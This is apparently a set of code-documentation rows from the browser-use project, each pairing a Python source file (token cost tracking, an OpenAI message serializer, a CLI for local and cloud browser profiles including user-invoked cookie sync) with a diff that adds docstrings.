)
for model, stats in summary.by_model.items():
# Format tokens
model_total_fmt = self._format_tokens(stats.total_tokens)
model_prompt_fmt = self._format_tokens(stats.prompt_tokens)
model_completion_fmt = self._format_tokens(stats.completion_tokens)
avg_tokens_fmt = self._format_tokens(int(stats.average_tokens_per_invocation))
# Format cost display (only if cost tracking is enabled)
if self.include_cost:
# Calculate per-model costs on-the-fly
total_model_cost = 0.0
model_prompt_cost = 0.0
model_completion_cost = 0.0
# Calculate costs for this model
for entry in self.usage_history:
if entry.model == model:
cost = await self.calculate_cost(entry.model, entry.usage)
if cost:
model_prompt_cost += cost.prompt_cost
model_completion_cost += cost.completion_cost
total_model_cost = model_prompt_cost + model_completion_cost
if total_model_cost > 0:
cost_part = f' (${C_MAGENTA}{total_model_cost:.4f}{C_RESET})'
prompt_part = f'{C_YELLOW}{model_prompt_fmt} (${model_prompt_cost:.4f}){C_RESET}'
completion_part = f'{C_GREEN}{model_completion_fmt} (${model_completion_cost:.4f}){C_RESET}'
else:
cost_part = ''
prompt_part = f'{C_YELLOW}{model_prompt_fmt}{C_RESET}'
completion_part = f'{C_GREEN}{model_completion_fmt}{C_RESET}'
else:
cost_part = ''
prompt_part = f'{C_YELLOW}{model_prompt_fmt}{C_RESET}'
completion_part = f'{C_GREEN}{model_completion_fmt}{C_RESET}'
cost_logger.debug(
f' 🤖 {C_CYAN}{model}{C_RESET}: {C_BLUE}{model_total_fmt} tokens{C_RESET}{cost_part} | '
f'⬅️ {prompt_part} | ➡️ {completion_part} | '
f'📞 {stats.invocations} calls | 📈 {avg_tokens_fmt}/call'
)
async def get_cost_by_model(self) -> dict[str, ModelUsageStats]:
summary = await self.get_usage_summary()
return summary.by_model
def clear_history(self) -> None:
self.usage_history = []
async def refresh_pricing_data(self) -> None:
if self.include_cost:
await self._fetch_and_cache_pricing_data()
async def clean_old_caches(self, keep_count: int = 3) -> None:
try:
# List all JSON files in the cache directory
cache_files = list(self._cache_dir.glob('*.json'))
if len(cache_files) <= keep_count:
return
# Sort by modification time (oldest first)
cache_files.sort(key=lambda f: f.stat().st_mtime)
# Remove all but the most recent files
for cache_file in cache_files[:-keep_count]:
try:
os.remove(cache_file)
except Exception:
pass
except Exception as e:
logger.debug(f'Error cleaning old cache files: {e}')
async def ensure_pricing_loaded(self) -> None:
if not self._initialized and self.include_cost:
# This will run in the background and won't block
await self.initialize() | --- +++ @@ -1,3 +1,9 @@+"""
+Token cost service that tracks LLM token usage and costs.
+
+Fetches pricing data from LiteLLM repository and caches it for 1 day.
+Automatically tracks token usage when LLMs are registered and invoked.
+"""
import logging
import os
@@ -40,6 +46,7 @@
class TokenCost:
+ """Service for tracking token usage and calculating costs"""
CACHE_DIR_NAME = 'browser_use/token_cost'
CACHE_DURATION = timedelta(days=1)
@@ -55,12 +62,14 @@ self._cache_dir = xdg_cache_home() / self.CACHE_DIR_NAME
async def initialize(self) -> None:
+ """Initialize the service by loading pricing data"""
if not self._initialized:
if self.include_cost:
await self._load_pricing_data()
self._initialized = True
async def _load_pricing_data(self) -> None:
+ """Load pricing data from cache or fetch from GitHub"""
# Try to find a valid cache file
cache_file = await self._find_valid_cache()
@@ -70,6 +79,7 @@ await self._fetch_and_cache_pricing_data()
async def _find_valid_cache(self) -> Path | None:
+ """Find the most recent valid cache file"""
try:
# Ensure cache directory exists
self._cache_dir.mkdir(parents=True, exist_ok=True)
@@ -99,6 +109,7 @@ return None
async def _is_cache_valid(self, cache_file: Path) -> bool:
+ """Check if a specific cache file is valid and not expired"""
try:
if not cache_file.exists():
return False
@@ -112,6 +123,7 @@ return False
async def _load_from_cache(self, cache_file: Path) -> None:
+ """Load pricing data from a specific cache file"""
try:
content = await anyio.Path(cache_file).read_text()
cached = CachedPricingData.model_validate_json(content)
@@ -122,6 +134,7 @@ await self._fetch_and_cache_pricing_data()
async def _fetch_and_cache_pricing_data(self) -> None:
+ """Fetch pricing data from LiteLLM GitHub and cache it with timestamp"""
try:
async with httpx.AsyncClient() as client:
response = await client.get(self.PRICING_URL, timeout=30)
@@ -146,6 +159,7 @@ self._pricing_data = {}
async def get_model_pricing(self, model_name: str) -> ModelPricing | None:
+ """Get pricing information for a specific model"""
# Ensure we're initialized
if not self._initialized:
await self.initialize()
@@ -211,6 +225,7 @@ )
def add_usage(self, model: str, usage: ChatInvokeUsage) -> TokenUsageEntry:
+ """Add token usage entry to history (without calculating cost)"""
entry = TokenUsageEntry(
model=model,
timestamp=datetime.now(),
@@ -229,6 +244,7 @@ # cost_logger.debug(f'🧠 llm : {C_CYAN}{llm.model}{C_RESET} (no usage found)')
async def _log_usage(self, model: str, usage: TokenUsageEntry) -> None:
+ """Log usage to the logger"""
if not self._initialized:
await self.initialize()
@@ -253,6 +269,7 @@ cost_logger.debug(f'🧠 {C_CYAN}{model}{C_RESET} | {input_part} | {output_part}')
def _build_input_tokens_display(self, usage: ChatInvokeUsage, cost: TokenCostCalculated | None) -> str:
+ """Build a clear display of input tokens breakdown with emojis and optional costs"""
C_YELLOW = '\033[93m'
C_BLUE = '\033[94m'
C_RESET = '\033[0m'
@@ -296,6 +313,11 @@ return ' + '.join(parts)
def register_llm(self, llm: BaseChatModel) -> BaseChatModel:
+ """
+ Register an LLM to automatically track its token usage
+
+ @dev Guarantees that the same instance is not registered multiple times
+ """
# Use instance ID as key to avoid collisions between multiple instances
instance_id = str(id(llm))
@@ -339,6 +361,7 @@ return llm
def get_usage_tokens_for_model(self, model: str) -> ModelUsageTokens:
+ """Get usage tokens for a specific model"""
filtered_usage = [u for u in self.usage_history if u.model == model]
return ModelUsageTokens(
@@ -350,6 +373,7 @@ )
async def get_usage_summary(self, model: str | None = None, since: datetime | None = None) -> UsageSummary:
+ """Get summary of token usage and costs (costs calculated on-the-fly)"""
filtered_usage = self.usage_history
if model:
@@ -421,6 +445,7 @@ )
def _format_tokens(self, tokens: int) -> str:
+ """Format token count with k suffix for thousands"""
if tokens >= 1000000000:
return f'{tokens / 1000000000:.1f}B'
if tokens >= 1000000:
@@ -430,6 +455,7 @@ return str(tokens)
async def log_usage_summary(self) -> None:
+ """Log a comprehensive usage summary per model with colors and nice formatting"""
if not self.usage_history:
return
@@ -512,17 +538,21 @@ )
async def get_cost_by_model(self) -> dict[str, ModelUsageStats]:
+ """Get cost breakdown by model"""
summary = await self.get_usage_summary()
return summary.by_model
def clear_history(self) -> None:
+ """Clear usage history"""
self.usage_history = []
async def refresh_pricing_data(self) -> None:
+ """Force refresh of pricing data from GitHub"""
if self.include_cost:
await self._fetch_and_cache_pricing_data()
async def clean_old_caches(self, keep_count: int = 3) -> None:
+ """Clean up old cache files, keeping only the most recent ones"""
try:
# List all JSON files in the cache directory
cache_files = list(self._cache_dir.glob('*.json'))
@@ -543,6 +573,7 @@ logger.debug(f'Error cleaning old cache files: {e}')
async def ensure_pricing_loaded(self) -> None:
+ """Ensure pricing data is loaded in the background. Call this after creating the service."""
if not self._initialized and self.include_cost:
# This will run in the background and won't block
- await self.initialize()+ await self.initialize()
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tokens/service.py |
Add docstrings for utility scripts | from typing import overload
from openai.types.chat import (
ChatCompletionAssistantMessageParam,
ChatCompletionContentPartImageParam,
ChatCompletionContentPartRefusalParam,
ChatCompletionContentPartTextParam,
ChatCompletionMessageFunctionToolCallParam,
ChatCompletionMessageParam,
ChatCompletionSystemMessageParam,
ChatCompletionUserMessageParam,
)
from openai.types.chat.chat_completion_content_part_image_param import ImageURL
from openai.types.chat.chat_completion_message_function_tool_call_param import Function
from browser_use.llm.messages import (
AssistantMessage,
BaseMessage,
ContentPartImageParam,
ContentPartRefusalParam,
ContentPartTextParam,
SystemMessage,
ToolCall,
UserMessage,
)
class OpenAIMessageSerializer:
    """Serializer converting internal message models to OpenAI chat-completion params."""

    @staticmethod
    def _serialize_content_part_text(part: ContentPartTextParam) -> ChatCompletionContentPartTextParam:
        """Convert an internal text part to the OpenAI text param."""
        return ChatCompletionContentPartTextParam(text=part.text, type='text')

    @staticmethod
    def _serialize_content_part_image(part: ContentPartImageParam) -> ChatCompletionContentPartImageParam:
        """Convert an internal image part to the OpenAI image_url param."""
        return ChatCompletionContentPartImageParam(
            image_url=ImageURL(url=part.image_url.url, detail=part.image_url.detail),
            type='image_url',
        )

    @staticmethod
    def _serialize_content_part_refusal(part: ContentPartRefusalParam) -> ChatCompletionContentPartRefusalParam:
        """Convert an internal refusal part to the OpenAI refusal param."""
        return ChatCompletionContentPartRefusalParam(refusal=part.refusal, type='refusal')

    @staticmethod
    def _serialize_user_content(
        content: str | list[ContentPartTextParam | ContentPartImageParam],
    ) -> str | list[ChatCompletionContentPartTextParam | ChatCompletionContentPartImageParam]:
        """Serialize user-message content (text and image parts allowed).

        Plain strings pass through unchanged; unknown part types are dropped.
        """
        if isinstance(content, str):
            return content
        serialized_parts: list[ChatCompletionContentPartTextParam | ChatCompletionContentPartImageParam] = []
        for part in content:
            if part.type == 'text':
                serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_text(part))
            elif part.type == 'image_url':
                serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_image(part))
        return serialized_parts

    @staticmethod
    def _serialize_system_content(
        content: str | list[ContentPartTextParam],
    ) -> str | list[ChatCompletionContentPartTextParam]:
        """Serialize system-message content (text parts only)."""
        if isinstance(content, str):
            return content
        serialized_parts: list[ChatCompletionContentPartTextParam] = []
        for part in content:
            if part.type == 'text':
                serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_text(part))
        return serialized_parts

    @staticmethod
    def _serialize_assistant_content(
        content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None,
    ) -> str | list[ChatCompletionContentPartTextParam | ChatCompletionContentPartRefusalParam] | None:
        """Serialize assistant-message content (text and refusal parts allowed).

        None passes through as None (assistant messages may carry only tool calls).
        """
        if content is None:
            return None
        if isinstance(content, str):
            return content
        serialized_parts: list[ChatCompletionContentPartTextParam | ChatCompletionContentPartRefusalParam] = []
        for part in content:
            if part.type == 'text':
                serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_text(part))
            elif part.type == 'refusal':
                serialized_parts.append(OpenAIMessageSerializer._serialize_content_part_refusal(part))
        return serialized_parts

    @staticmethod
    def _serialize_tool_call(tool_call: ToolCall) -> ChatCompletionMessageFunctionToolCallParam:
        """Convert an internal tool call to the OpenAI function tool-call param."""
        return ChatCompletionMessageFunctionToolCallParam(
            id=tool_call.id,
            function=Function(name=tool_call.function.name, arguments=tool_call.function.arguments),
            type='function',
        )

    # endregion

    # region - Serialize overloads
    @overload
    @staticmethod
    def serialize(message: UserMessage) -> ChatCompletionUserMessageParam: ...

    @overload
    @staticmethod
    def serialize(message: SystemMessage) -> ChatCompletionSystemMessageParam: ...

    @overload
    @staticmethod
    def serialize(message: AssistantMessage) -> ChatCompletionAssistantMessageParam: ...

    @staticmethod
    def serialize(message: BaseMessage) -> ChatCompletionMessageParam:
        """Serialize one internal message to an OpenAI message param.

        Optional fields (name, refusal, tool_calls, assistant content) are only
        included when present, matching the OpenAI TypedDict expectations.

        Raises:
            ValueError: For message types other than User/System/Assistant.
        """
        if isinstance(message, UserMessage):
            user_result: ChatCompletionUserMessageParam = {
                'role': 'user',
                'content': OpenAIMessageSerializer._serialize_user_content(message.content),
            }
            if message.name is not None:
                user_result['name'] = message.name
            return user_result
        elif isinstance(message, SystemMessage):
            system_result: ChatCompletionSystemMessageParam = {
                'role': 'system',
                'content': OpenAIMessageSerializer._serialize_system_content(message.content),
            }
            if message.name is not None:
                system_result['name'] = message.name
            return system_result
        elif isinstance(message, AssistantMessage):
            # Handle content serialization
            content = None
            if message.content is not None:
                content = OpenAIMessageSerializer._serialize_assistant_content(message.content)
            assistant_result: ChatCompletionAssistantMessageParam = {'role': 'assistant'}
            # Only add content if it's not None
            if content is not None:
                assistant_result['content'] = content
            if message.name is not None:
                assistant_result['name'] = message.name
            if message.refusal is not None:
                assistant_result['refusal'] = message.refusal
            if message.tool_calls:
                assistant_result['tool_calls'] = [OpenAIMessageSerializer._serialize_tool_call(tc) for tc in message.tool_calls]
            return assistant_result
        else:
            raise ValueError(f'Unknown message type: {type(message)}')
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
return [OpenAIMessageSerializer.serialize(m) for m in messages] | --- +++ @@ -26,6 +26,7 @@
class OpenAIMessageSerializer:
+ """Serializer for converting between custom message types and OpenAI message param types."""
@staticmethod
def _serialize_content_part_text(part: ContentPartTextParam) -> ChatCompletionContentPartTextParam:
@@ -46,6 +47,7 @@ def _serialize_user_content(
content: str | list[ContentPartTextParam | ContentPartImageParam],
) -> str | list[ChatCompletionContentPartTextParam | ChatCompletionContentPartImageParam]:
+ """Serialize content for user messages (text and images allowed)."""
if isinstance(content, str):
return content
@@ -61,6 +63,7 @@ def _serialize_system_content(
content: str | list[ContentPartTextParam],
) -> str | list[ChatCompletionContentPartTextParam]:
+ """Serialize content for system messages (text only)."""
if isinstance(content, str):
return content
@@ -74,6 +77,7 @@ def _serialize_assistant_content(
content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None,
) -> str | list[ChatCompletionContentPartTextParam | ChatCompletionContentPartRefusalParam] | None:
+ """Serialize content for assistant messages (text and refusal allowed)."""
if content is None:
return None
if isinstance(content, str):
@@ -112,6 +116,7 @@
@staticmethod
def serialize(message: BaseMessage) -> ChatCompletionMessageParam:
+ """Serialize a custom message to an OpenAI message param."""
if isinstance(message, UserMessage):
user_result: ChatCompletionUserMessageParam = {
@@ -157,4 +162,4 @@
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[ChatCompletionMessageParam]:
- return [OpenAIMessageSerializer.serialize(m) for m in messages]+ return [OpenAIMessageSerializer.serialize(m) for m in messages]
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openai/serializer.py |
Write reusable docstrings |
import argparse
import json
import logging
import sys
import tempfile
from pathlib import Path
from typing import Any, Literal
from browser_use.skill_cli.commands.utils import get_sdk_client
logger = logging.getLogger(__name__)
ProfileMode = Literal['real', 'remote']
class ProfileModeError(Exception):
    """Raised when the profile mode (real/remote) is unsupported or cannot be determined."""

    pass
def get_profile_mode(args: argparse.Namespace) -> ProfileMode:
    """Resolve which profile system to use: 'real' (local Chrome) or 'remote' (cloud).

    An explicit ``-b`` flag wins; 'chromium' is rejected. Without a flag the
    mode is inferred from the install config, failing when both modes or
    neither mode is available (ambiguous / unconfigured).

    Raises:
        ProfileModeError: When the mode is unsupported, ambiguous, or unavailable.
    """
    from browser_use.skill_cli.install_config import is_mode_available

    browser_mode = getattr(args, 'browser', None)
    # Explicit mode specified
    if browser_mode == 'real':
        return 'real'
    elif browser_mode == 'remote':
        return 'remote'
    elif browser_mode == 'chromium':
        raise ProfileModeError(
            'Profile commands are not supported in chromium mode.\n'
            'Use -b real for local Chrome profiles or -b remote for cloud profiles.'
        )
    # No explicit mode - try to infer from install config
    local_available = is_mode_available('real')
    remote_available = is_mode_available('remote')
    if local_available and not remote_available:
        return 'real'
    elif remote_available and not local_available:
        return 'remote'
    elif local_available and remote_available:
        raise ProfileModeError(
            'Both local and remote modes are available.\n'
            'Specify -b real for local Chrome profiles or -b remote for cloud profiles.'
        )
    else:
        raise ProfileModeError('No profile modes available. Run browser-use setup first.')
def handle_profile_command(args: argparse.Namespace) -> int:
    """Dispatch a `profile` subcommand to its handler.

    Returns a process exit code: 0 on success, 1 on error or missing/unknown
    command. `sync` bypasses mode inference because it spans local → cloud.
    """
    command = args.profile_command
    # Commands that don't need mode inference
    if command is None:
        _print_usage()
        return 1
    # For sync command, we need special handling (local → cloud)
    if command == 'sync':
        return _handle_sync(args)
    # Get profile mode for all other commands
    try:
        mode = get_profile_mode(args)
    except ProfileModeError as e:
        print(f'Error: {e}', file=sys.stderr)
        return 1
    # Route to appropriate handler
    if command == 'list':
        return _handle_list(args, mode)
    elif command == 'get':
        return _handle_get(args, mode)
    elif command == 'create':
        return _handle_create(args, mode)
    elif command == 'update':
        return _handle_update(args, mode)
    elif command == 'delete':
        return _handle_delete(args, mode)
    elif command == 'cookies':
        return _handle_cookies(args, mode)
    else:
        _print_usage()
        return 1
def _print_usage() -> None:
    """Print usage help for the `profile` command group to stdout."""
    print('Usage: browser-use [-b real|remote] profile <command>')
    print()
    print('Commands:')
    print(' list List profiles')
    print(' get <id> Get profile details')
    print(' create Create a new profile (remote only)')
    print(' update <id> Update profile')
    print(' delete <id> Delete profile')
    print(' cookies <id> Show cookies by domain (real only)')
    print(' sync Sync local profile to cloud')
    print()
    print('The -b flag determines which profile system to use:')
    print(' -b real Local Chrome profiles')
    print(' -b remote Cloud profiles (requires API key)')
# -----------------------------------------------------------------------------
# List profiles
# -----------------------------------------------------------------------------
def _handle_list(args: argparse.Namespace, mode: ProfileMode) -> int:
    """Route the `profile list` command to the local or cloud implementation."""
    handler = _list_local_profiles if mode == 'real' else _list_cloud_profiles
    return handler(args)
def _list_local_profiles(args: argparse.Namespace) -> int:
profiles = list_local_chrome_profiles()
if getattr(args, 'json', False):
print(json.dumps({'profiles': profiles}))
else:
if profiles:
print('Local Chrome profiles:')
for p in profiles:
print(f' {p["id"]}: {p["name"]} ({p["email"]})')
else:
print('No Chrome profiles found')
return 0
def _list_cloud_profiles(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
page = getattr(args, 'page', 1)
page_size = getattr(args, 'page_size', 20)
try:
client = get_sdk_client()
response = client.profiles.list_profiles(page_number=page, page_size=page_size)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
# Convert to dict for JSON output
data = {
'items': [{'id': p.id, 'name': p.name} for p in response.items],
'totalItems': response.total_items,
'pageNumber': response.page_number,
'pageSize': response.page_size,
}
print(json.dumps(data))
else:
if response.items:
print(f'Cloud profiles ({len(response.items)}/{response.total_items}):')
for p in response.items:
name = p.name or 'Unnamed'
print(f' {p.id}: {name}')
else:
print('No cloud profiles found')
return 0
# -----------------------------------------------------------------------------
# Get profile
# -----------------------------------------------------------------------------
def _handle_get(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
return _get_local_profile(args)
else:
return _get_cloud_profile(args)
def _get_local_profile(args: argparse.Namespace) -> int:
profiles = list_local_chrome_profiles()
profile_id = args.id
for p in profiles:
if p['id'] == profile_id or p['name'] == profile_id:
if getattr(args, 'json', False):
print(json.dumps(p))
else:
print(f'Profile: {p["id"]}')
print(f' Name: {p["name"]}')
print(f' Email: {p["email"]}')
return 0
print(f'Error: Profile "{profile_id}" not found', file=sys.stderr)
return 1
def _get_cloud_profile(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
try:
client = get_sdk_client()
profile = client.profiles.get_profile(args.id)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
data = {
'id': profile.id,
'name': profile.name,
'createdAt': profile.created_at.isoformat() if profile.created_at else None,
'updatedAt': profile.updated_at.isoformat() if profile.updated_at else None,
}
print(json.dumps(data))
else:
print(f'Profile: {profile.id}')
if profile.name:
print(f' Name: {profile.name}')
if profile.created_at:
print(f' Created: {profile.created_at.isoformat()}')
if profile.updated_at:
print(f' Updated: {profile.updated_at.isoformat()}')
return 0
# -----------------------------------------------------------------------------
# Create profile
# -----------------------------------------------------------------------------
def _handle_create(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
print('Error: Cannot create local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser to create new profiles.', file=sys.stderr)
return 1
return _create_cloud_profile(args)
def _create_cloud_profile(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
try:
client = get_sdk_client()
params = {}
if args.name:
params['name'] = args.name
profile = client.profiles.create_profile(**params)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'id': profile.id, 'name': profile.name}))
else:
print(f'Created profile: {profile.id}')
return 0
# -----------------------------------------------------------------------------
# Update profile
# -----------------------------------------------------------------------------
def _handle_update(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
print('Error: Cannot update local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser settings to update profiles.', file=sys.stderr)
return 1
return _update_cloud_profile(args)
def _update_cloud_profile(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
try:
client = get_sdk_client()
params = {}
if args.name:
params['name'] = args.name
profile = client.profiles.update_profile(args.id, **params)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'id': profile.id, 'name': profile.name}))
else:
print(f'Updated profile: {profile.id}')
return 0
# -----------------------------------------------------------------------------
# Delete profile
# -----------------------------------------------------------------------------
def _handle_delete(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'real':
print('Error: Cannot delete local Chrome profiles via CLI.', file=sys.stderr)
print('Use Chrome browser settings to remove profiles.', file=sys.stderr)
return 1
return _delete_cloud_profile(args)
def _delete_cloud_profile(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired
try:
client = get_sdk_client()
client.profiles.delete_browser_profile(args.id)
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'deleted': args.id}))
else:
print(f'Deleted profile: {args.id}')
return 0
# -----------------------------------------------------------------------------
# Cookies (local only)
# -----------------------------------------------------------------------------
def _handle_cookies(args: argparse.Namespace, mode: ProfileMode) -> int:
if mode == 'remote':
print('Error: Cookie listing is only available for local Chrome profiles.', file=sys.stderr)
print('Use -b real to access local profile cookies.', file=sys.stderr)
return 1
return _list_profile_cookies(args)
def _list_profile_cookies(args: argparse.Namespace) -> int:
import asyncio
from browser_use.skill_cli.sessions import create_browser_session
# Get local profiles
local_profiles = list_local_chrome_profiles()
if not local_profiles:
print('Error: No local Chrome profiles found', file=sys.stderr)
return 1
# Find the matching profile
profile_arg = args.id
selected_profile = None
for p in local_profiles:
if p['id'] == profile_arg or p['name'] == profile_arg:
selected_profile = p
break
if not selected_profile:
print(f'Error: Profile "{profile_arg}" not found', file=sys.stderr)
print('Available profiles:')
for p in local_profiles:
print(f' {p["id"]}: {p["name"]}')
return 1
profile_id = selected_profile['id']
print(f'Loading cookies from: {selected_profile["name"]} ({selected_profile["email"]})')
async def get_cookies():
local_session = await create_browser_session('real', headed=False, profile=profile_id)
await local_session.start()
try:
cookies = await local_session._cdp_get_cookies()
return cookies
finally:
await local_session.kill()
try:
cookies = asyncio.get_event_loop().run_until_complete(get_cookies())
except RuntimeError:
cookies = asyncio.run(get_cookies())
# Group cookies by domain
domains: dict[str, int] = {}
for cookie in cookies:
domain = cookie.get('domain', 'unknown')
# Normalize domain (remove leading dot)
if domain.startswith('.'):
domain = domain[1:]
domains[domain] = domains.get(domain, 0) + 1
# Sort by count descending
sorted_domains = sorted(domains.items(), key=lambda x: x[1], reverse=True)
if getattr(args, 'json', False):
print(json.dumps({'domains': dict(sorted_domains), 'total_cookies': len(cookies)}))
else:
print(f'\nCookies by domain ({len(cookies)} total):')
for domain, count in sorted_domains[:20]: # Show top 20
print(f' {domain}: {count}')
if len(sorted_domains) > 20:
print(f' ... and {len(sorted_domains) - 20} more domains')
print('\nTo sync cookies to cloud:')
print(f' browser-use profile sync --from "{profile_id}" --domain <domain>')
return 0
# -----------------------------------------------------------------------------
# Sync (local → cloud)
# -----------------------------------------------------------------------------
def _handle_sync(args: argparse.Namespace) -> int:
import asyncio
from browser_use.skill_cli.api_key import APIKeyRequired
from browser_use.skill_cli.sessions import create_browser_session
# Get SDK client (validates API key)
try:
client = get_sdk_client()
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
# Get local profiles
local_profiles = list_local_chrome_profiles()
if not local_profiles:
print('Error: No local Chrome profiles found', file=sys.stderr)
return 1
# Determine which profile to sync
from_profile = args.from_profile
if not from_profile:
# Show available profiles and ask user to specify
print('Available local profiles:')
for p in local_profiles:
print(f' {p["id"]}: {p["name"]} ({p["email"]})')
print()
print('Use --from to specify a profile:')
print(' browser-use profile sync --from "Default"')
print(' browser-use profile sync --from "Profile 1"')
return 1
# Find the matching profile
selected_profile = None
for p in local_profiles:
if p['id'] == from_profile or p['name'] == from_profile:
selected_profile = p
break
if not selected_profile:
print(f'Error: Profile "{from_profile}" not found', file=sys.stderr)
print('Available profiles:')
for p in local_profiles:
print(f' {p["id"]}: {p["name"]}')
return 1
profile_id = selected_profile['id']
profile_name = selected_profile['name']
domain_filter = getattr(args, 'domain', None)
# Generate cloud profile name
cloud_name = args.name if args.name else None
if not cloud_name:
if domain_filter:
cloud_name = f'Chrome - {profile_name} ({domain_filter})'
else:
cloud_name = f'Chrome - {profile_name}'
# Use stderr for progress when JSON output is requested
json_output = getattr(args, 'json', False)
out = sys.stderr if json_output else sys.stdout
def log(msg: str) -> None:
print(msg, file=out)
if domain_filter:
log(f'Syncing: {profile_name} → {domain_filter} cookies only')
else:
log(f'Syncing: {profile_name} ({selected_profile["email"]})')
# Step 1: Create cloud profile
log(' Creating cloud profile...')
try:
cloud_profile = client.profiles.create_profile(name=cloud_name)
cloud_profile_id = cloud_profile.id
except Exception as e:
print(f'Error creating cloud profile: {e}', file=sys.stderr)
return 1
log(f' ✓ Created: {cloud_profile_id}')
def cleanup_cloud_profile() -> None:
try:
client.profiles.delete_browser_profile(cloud_profile_id)
except Exception:
pass
# Step 2: Export cookies from local profile
async def sync_cookies():
log(' Exporting cookies from local profile...')
local_session = await create_browser_session('real', headed=False, profile=profile_id)
await local_session.start()
try:
cookies = await local_session._cdp_get_cookies()
if not cookies:
return 0, 'No cookies found in local profile'
# Filter by domain if specified
if domain_filter:
cookies = [c for c in cookies if domain_filter in c.get('domain', '')]
if not cookies:
return 0, f'No cookies found for domain: {domain_filter}'
log(f' ✓ Found {len(cookies)} cookies')
# Save to temp file - convert Cookie objects to dicts for JSON serialization
cookies_file = Path(tempfile.gettempdir()) / f'browser-use-sync-{cloud_profile_id}.json'
cookies_data = [dict(c) if hasattr(c, '__dict__') else c for c in cookies]
cookies_file.write_text(json.dumps(cookies_data))
return len(cookies), str(cookies_file)
finally:
await local_session.kill()
try:
loop = asyncio.get_event_loop()
if loop.is_running():
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor() as executor:
future = executor.submit(asyncio.run, sync_cookies())
cookie_count, cookies_file = future.result()
else:
cookie_count, cookies_file = loop.run_until_complete(sync_cookies())
except RuntimeError:
cookie_count, cookies_file = asyncio.run(sync_cookies())
if cookie_count == 0:
log(f' ⚠ {cookies_file}') # cookies_file contains error message
cleanup_cloud_profile()
return 1
# Step 3: Import cookies to cloud profile
async def import_to_cloud():
log(' Importing cookies to cloud profile...')
remote_session = await create_browser_session('remote', headed=False, profile=cloud_profile_id)
await remote_session.start()
try:
cookies = json.loads(Path(cookies_file).read_text())
await remote_session._cdp_set_cookies(cookies)
return True
finally:
await remote_session.kill()
try:
loop = asyncio.get_event_loop()
if loop.is_running():
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor() as executor:
future = executor.submit(asyncio.run, import_to_cloud())
future.result()
else:
loop.run_until_complete(import_to_cloud())
except RuntimeError:
asyncio.run(import_to_cloud())
except Exception as e:
log(f' ⚠ Failed to import cookies: {e}')
cleanup_cloud_profile()
return 1
# Cleanup temp file
try:
Path(cookies_file).unlink()
except Exception:
pass
log('✓ Profile synced successfully!')
log(f' Cloud profile ID: {cloud_profile_id}')
log('')
log('To use this profile:')
log(f' browser-use -b remote --profile {cloud_profile_id} open <url>')
if json_output:
print(
json.dumps(
{
'success': True,
'profile_id': cloud_profile_id,
'cookies_synced': cookie_count,
}
)
)
return 0
# -----------------------------------------------------------------------------
# Helpers
# -----------------------------------------------------------------------------
def list_local_chrome_profiles() -> list[dict[str, Any]]:
import platform
# Find Chrome Local State file
system = platform.system()
if system == 'Darwin':
local_state = Path.home() / 'Library/Application Support/Google/Chrome/Local State'
elif system == 'Windows':
local_state = Path.home() / 'AppData/Local/Google/Chrome/User Data/Local State'
else:
local_state = Path.home() / '.config/google-chrome/Local State'
if not local_state.exists():
return []
try:
data = json.loads(local_state.read_text())
profiles_info = data.get('profile', {}).get('info_cache', {})
profiles = []
for profile_id, info in profiles_info.items():
profiles.append(
{
'id': profile_id,
'name': info.get('name', profile_id),
'email': info.get('user_name', ''),
}
)
return profiles
except Exception:
return [] | --- +++ @@ -1,3 +1,8 @@+"""Profile management command handlers.
+
+Unified profile management that works with both local Chrome profiles and cloud profiles.
+The behavior is determined by the browser mode (-b real or -b remote).
+"""
import argparse
import json
@@ -16,11 +21,23 @@
class ProfileModeError(Exception):
+ """Raised when profile mode cannot be determined or is invalid."""
pass
def get_profile_mode(args: argparse.Namespace) -> ProfileMode:
+ """Determine profile mode from -b flag or install config.
+
+ Args:
+ args: Parsed command-line arguments with browser attribute
+
+ Returns:
+ 'real' for local Chrome profiles, 'remote' for cloud profiles
+
+ Raises:
+ ProfileModeError: If mode cannot be determined or chromium mode is used
+ """
from browser_use.skill_cli.install_config import is_mode_available
browser_mode = getattr(args, 'browser', None)
@@ -54,6 +71,10 @@
def handle_profile_command(args: argparse.Namespace) -> int:
